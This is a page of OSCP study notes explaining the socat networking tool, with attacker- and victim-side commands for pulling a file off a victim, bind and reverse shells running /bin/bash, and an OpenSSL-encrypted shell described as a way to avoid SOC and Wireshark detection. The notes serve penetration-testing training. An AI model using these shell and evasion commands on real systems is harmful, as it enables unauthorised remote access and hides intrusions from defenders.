0Sec
0Sec
0Sec
  • Spider Security
  • offensive security
    • OSCP
      • WriteUps
        • PortSwigger
          • SQL injection labs
          • Exploiting XXE to retrieve data by repurposing a local DTD
        • PentesterLabs
          • Recon
        • HTB
          • BoardLight
          • Lame
        • THM
          • Walkthroughs
            • Attacktive Directory
            • LineKernel
            • Day 1 — Linux PrivEsc
          • CTF
            • Page
            • BLUE
            • mKingdom
            • RazorBlack
      • Module 1 (General Info)
      • Module 2 (Getting Kali)
        • Leason 1 - Booting Up Kali Linux
        • Leason 2 - The Kali Menu
        • Leason 4 - Finding Your Way Around Kali
        • Leason 5 - Managing Kali Linux Services
      • Module 3 (CLI)
        • The Bash Environment
        • Piping and Redirection
        • Text Searching and Manipulation
          • Regular
        • Managing Processes
        • File and Command Monitoring
      • Module 4 (Practical Tools)
        • Netcat
        • Socat
        • PowerShell & Powercat
        • Wireshark
        • Tcpdump
      • Module 5 (Bash Script)
      • Module 6 (Passive Info Gathering)
      • Module 7 ( Active Info Gathering)
      • Module 8 (Vulnerability Scanning)
      • Module 9 (Web Application Attacks)
        • Cross Site Scripting (XSS)
        • local file inclusion & remote file inclusion
          • Exploit LFI
        • SQL injection
          • Blind Boolean based SQL & Evasion Techniques
          • SQL
          • Login bypass List
        • File upload
        • Remote code execution
      • Module 10 ( Intro Buffer OverFlow)
      • Module 11 (Widows Buffer OverFlow)
        • Buffer OverFlow Challange
      • Module 12 (Linux Buffer OverFlows)
      • Module 13 (Clint Side Attacks)
      • Module 14 (Locating Public Exploits)
      • Module 15 (FIxing Exploits)
      • Module 16 (File Transfers)
      • Module 17 (Antivirus Evasion)
        • Windows
      • Module 18 (Privllege Escalation)
        • Windows
          • Checklist
          • THM - Windows PrivEsc Arena
        • Linux
          • Checklist
          • Linux PrivEsc Arena
      • Module 19 (Password Attacks)
      • Module 20 (Port Redirection and Tunneling)
      • Module 21 (Active Directory Attacks)
        • adbasics_v1.2
      • Module 22 (Metasploit Framwork)
      • Module 23 (Powershell Empire)
      • Course Materials
  • SANS
  • AppSec
    • EWAPTX
      • PHP Type Juggling
      • CSP
      • SqlI
        • Information_schema
        • WriteUps
      • SSTI & CSTI
      • XSS_HTML Injection
      • CORS Attack
      • Clickjacking
      • Open redirect
      • JSONP
      • LFI && LFD && RFI
      • HTTP Host header attacks
      • CSRF
      • XML injection
      • XML external entity (XXE) injection
      • APIs & JWT attacks
      • Insecure Deserialization
      • OAUTH 2.0 authentication vulnerabilities
      • Host Header Injection
      • Insecure Direct Object References (IDOR)
  • Reverse Eng & Malware dev
    • Internals
      • Windows internals
        • Topics in GitHub
        • Chapter 1 Concepts and tools
        • Chapter 2. System architecture
        • Chapter 3. Processes and jobs
        • Chapter 4. Threads
        • Chapter 5. Memory management
        • Chapter 6. I/O system
        • Chapter 7. Security
      • Linux internals ⇒ Soon
      • MacOs X internals ⇒ Soon
  • cheat sheet
    • Pentest_Notes
    • Linux BOF & Wireless Attacks
    • WriteUps
Powered by GitBook
On this page
  • SOCAT
  • Socat Encrypted Bund Shell
  • Wireshark
  • Socat VS Netcat
  • Reverse shell VS Bind
  1. offensive security
  2. OSCP
  3. Module 4 (Practical Tools)

Socat

The abbreviation of the tool name is Socket Cat

PreviousNetcatNextPowerShell & Powercat

Last updated 11 months ago

SOCAT

  • Connection To a TCP/UDP Port

Attacker Machine

socat - TCP4:<IP>:<PORT>

- Stdin

  • Listening To a TCP/UDP Port

Victim Machine

socat TCP4-LISTEN:<PORT> stdout
  • Transfer File With Socat

Attacker Machine

socat  TCP4:<IP>:<PORT> file:sec.txt,create
  • socat: This is the command itself, which stands for "SOcket CAT". It is a multipurpose relay tool that can create two bidirectional byte streams and transfer data between them.

  • TCP4: This specifies the address type and protocol to be used. TCP4 indicates that the connection will use the IPv4 protocol with TCP.

  • <IP>: This is a placeholder for the IP address of the remote host to which you want to connect.

  • <PORT>: This is a placeholder for the port number on the remote host to which you want to connect.

  • file.txt: This specifies the second address as a file. The data received from the TCP connection will be written to (or read from) this file. Here, sec.txt is the filename.

  • create: This option ensures that the file sec.txt is created if it does not already exist. Without this option, if the file does not exist, the command would fail.

Victim Machine

socat TCP4-LISTEN:<PORT>,fork file:sec.txt 
  • socat: This is the command itself, which stands for "SOcket CAT". It is a utility for data transfer between two bidirectional data streams.

  • TCP4-LISTEN:<PORT>: This specifies that socat should listen for incoming TCP connections on the specified port (replace <PORT> with the actual port number you want to use).

  • fork: This option tells socat to fork (create a new process) for each incoming connection. This allows socat to handle multiple connections simultaneously.

  • file:sec.txt: This specifies that the data received from each connection should be written to the file sec.txt.

The advantage of Socat is that it allows more than one person to connect to the same port at the same time, and the connection is not separated, which is what distinguishes it from NC.

U Cant Use Standard Input | Output And Redirect

Victim Machine

socat tcp-listen:4444,fork - < sec.txt

- -> Using Standard Input , After This , Waiting for Input

< -> Using Redirect Character , Send Content File

Attacker Machine

 socat tcp4:192.168.43.1:4444 - > sec.txt

- -> Using Standard Input , After This , Waiting for Input

> -> Using Redirect Character , Store In File (Override) >> -> If U Want Adding Content In File With Old Value

  • Socat Bind

Attacker Machine

socat  -d -d -d - TCP4:<IP>:<PORT>

Victim Machine

socat -d -d -d tcp4-listen:<PORT<,fork exec:/bin/bash
  • socat: The command-line utility for bidirectional data transfer between two independent data channels.

  • -d -d -d: These flags enable different levels of debugging output. Each -d increases the verbosity of the debug information.

  • tcp4-listen:<PORT>: This option tells socat to listen for incoming TCP connections on the specified port (<PORT>). The tcp4 part specifies that only IPv4 connections are accepted.

  • fork: This option tells socat to fork a new process for each incoming connection. This allows multiple clients to connect simultaneously, each handled by its own process.

  • exec:/bin/bash: This part of the command specifies that when a connection is established, socat should execute /bin/bash. This effectively provides a shell to the connected client.

Socat Reverse Shells

Attacker Machine

socat -d -d -v tcp4-listen:<PORT> stdout

Victim Machine

socat  -d -d TCP4:<IP>:<PORT>,fork  exec:/bin/bash

Socat Encrypted Bund Shell

In normal use of the tool, if there is someone monitoring the communications that occur, if there is a SOC team monitoring everything that happens. It will see exactly what you are doing in terms of commands on the server or to victims inside the network and other things, so you may be easily detected and even know exactly what you were doing.

Let's see this , Using Wireshark :

ip.addr == 192.168.43.1 && tcp

Here I use a filter to filter the TCP packets because you will find a lot of connections using more than one different protocol, and this is a normal thing within the network.

--

As you can see, as soon as he typed the ls command, the packet and connections started to appear

--

If you notice some strange letters, this is because those strange letters have a relationship to the colors that appear in the terminal. Some of them have a relationship to the formats inside the terminal, such as dropping a new line to display the rest of the files, such as the color of the file name and the color of the folders.

As you can see, this is a behavior that is very clear to anyone monitoring what is happening on the network

--

To hide this, we will encrypt the packet and all communications that occur between us and the other device , Using an encryption key we will create

  • Generate key.pem

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365

req ⇒ Indicates that we want to use OpenSSL in requests mode, which is used to create or process requests for SSL certificates.

-x509 ⇒ Indicates that we want to create an X.509 certificate, which is a common format for digital certificates.

-newkey rsa:4096 ⇒ OpenSSL says it should generate a new RSA key pair with a length of 4096 bits. The private and public key are generated in this step

-keyout ⇒ Specifies the name of the file in which the private key will be saved. In this case, the private key will be saved in a file called key.pem

-out ⇒ Specifies the name of the file in which the public certificate will be saved. In this case, the public certificate will be saved in a file called cert.pem.

-days ⇒ It determines the validity period of the certificate after its issuance, and here it is set to be valid for one year (365 days).

--

Attacker

socat - openssl:<IP>:<PORT>,verify=0

Victim

socat -d -d -v openssl-listen:6666,cert=bind.pem,fork,verify=0 exec:/bin/bash

Wireshark

Data is Encrypted Using openssl

Socat VS Netcat

Summary Table

Feature
Netcat (nc)
Socat

Protocol Support

TCP, UDP

TCP, UDP, SCTP, UNIX sockets, and more

Ease of Use

Simple, easy to use

More complex, steeper learning curve

Functionality

Basic networking tasks

Advanced networking capabilities

Port Scanning

Yes

No

Data Transformation

No

Yes

Proxying/Relaying

Basic

Advanced

Debugging

Basic

Detailed

File Transfer

Yes

Yes

Conclusion

  • Use netcat for simpler, quick networking tasks such as port scanning, basic data transfer, and simple shell setups.

  • Use socat when you need advanced capabilities such as data transformation, complex proxying, and handling multiple types of sockets and protocols.

Choose the tool based on the complexity of the task and the level of control you need over the network connections and data streams.

Reverse shell VS Bind

Summary Table

Feature
Reverse Shell
Bind Shell

Connection Initiator

Target

Attacker

Firewall/NAT Evasion

Easier

Harder

Setup Complexity

More complex on target side

Simpler on target side

Detection Risk

Moderate (outbound connection)

Higher (listening port)

Use Case

When outbound connections are allowed

When the attacker can’t receive connections

Conclusion

  • Reverse Shell is generally more flexible in bypassing network restrictions.

  • Bind Shell can be simpler but is more likely to be blocked by network defenses.

  • Choose the method based on the network environment and specific constraints you are working with. Always ensure you have authorization and understand the legal implications of using these techniques.

Online Reverse Shell
Socat
From WSL Ubuntu , Connected In Termux
Fingerprint
Right Click > Follow > TCP Stream Or Ctrl + Alt + Shift + T
PEM
Page cover image